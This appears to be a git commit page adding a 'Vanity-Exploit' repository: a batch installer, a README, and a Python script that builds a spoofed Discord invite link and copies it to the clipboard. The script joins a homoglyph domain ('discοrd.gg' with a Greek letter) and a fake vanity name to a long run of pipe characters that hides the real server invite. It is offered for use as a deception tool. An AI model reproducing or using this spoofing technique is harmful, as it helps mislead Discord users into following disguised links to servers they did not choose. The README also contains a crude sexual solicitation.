e
This commit is contained in:
commit
58d3db04c2
3 changed files with 50 additions and 0 deletions
9
Install.bat
Normal file
9
Install.bat
Normal file
|
@ -0,0 +1,9 @@
|
|||
@echo off
|
||||
title Vanity-Exploit Modules Installer
|
||||
cls
|
||||
echo Wait 10 - 15 Seconds!
|
||||
pip install clipboard
|
||||
cls
|
||||
echo Modules installed, press any key for exit!
|
||||
pause
|
||||
exit
|
16
README.md
Normal file
16
README.md
Normal file
|
@ -0,0 +1,16 @@
|
|||
# VANITY-EXPLOIT
|
||||
Vanity Exploit Spoofs A Discord Vanity Link
|
||||
|
||||
# Installation
|
||||
[Download the repo](https://gitdab.com/12/Vanity-Exploit) & Run Install.bat
|
||||
|
||||
# Previews
|
||||
<img src="https://belle.is-inside.me/1bYftHeI.png"/>
|
||||
<img src="https://belle.is-inside.me/aCPrjApI.png"/>
|
||||
<img src="https://belle.is-inside.me/TsMEHgBy.png"/>
|
||||
|
||||
# Discord
|
||||
Syz#0001 Send Nudes
|
||||
|
||||
# Credit
|
||||
Credit to [Rezizt](https://github.com/REZIZT1337) For Finding This Exploit
|
25
Vanity-Exploit.py
Normal file
25
Vanity-Exploit.py
Normal file
|
@ -0,0 +1,25 @@
|
|||
import clipboard
|
||||
|
||||
intro = """
|
||||
|
||||
██╗ ██╗ █████╗ ███╗ ██╗██╗████████╗██╗ ██╗
|
||||
██║ ██║██╔══██╗████╗ ██║██║╚══██╔══╝╚██╗ ██╔╝
|
||||
██║ ██║███████║██╔██╗ ██║██║ ██║ ╚████╔╝
|
||||
╚██╗ ██╔╝██╔══██║██║╚██╗██║██║ ██║ ╚██╔╝
|
||||
╚████╔╝ ██║ ██║██║ ╚████║██║ ██║ ██║
|
||||
╚═══╝ ╚═╝ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═╝ ╚═╝
|
||||
|
||||
"""
|
||||
|
||||
print(intro)
|
||||
|
||||
server = input("Server invite:")
|
||||
invite = input("new invite name:")
|
||||
|
||||
vanity = "discοrd.gg/" + invite + "||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||" + server
|
||||
clipboard.copy(vanity)
|
||||
|
||||
print('Copied to clipboard!')
|
||||
|
||||
input()
|
||||
print()
|
Loading…
Reference in a new issue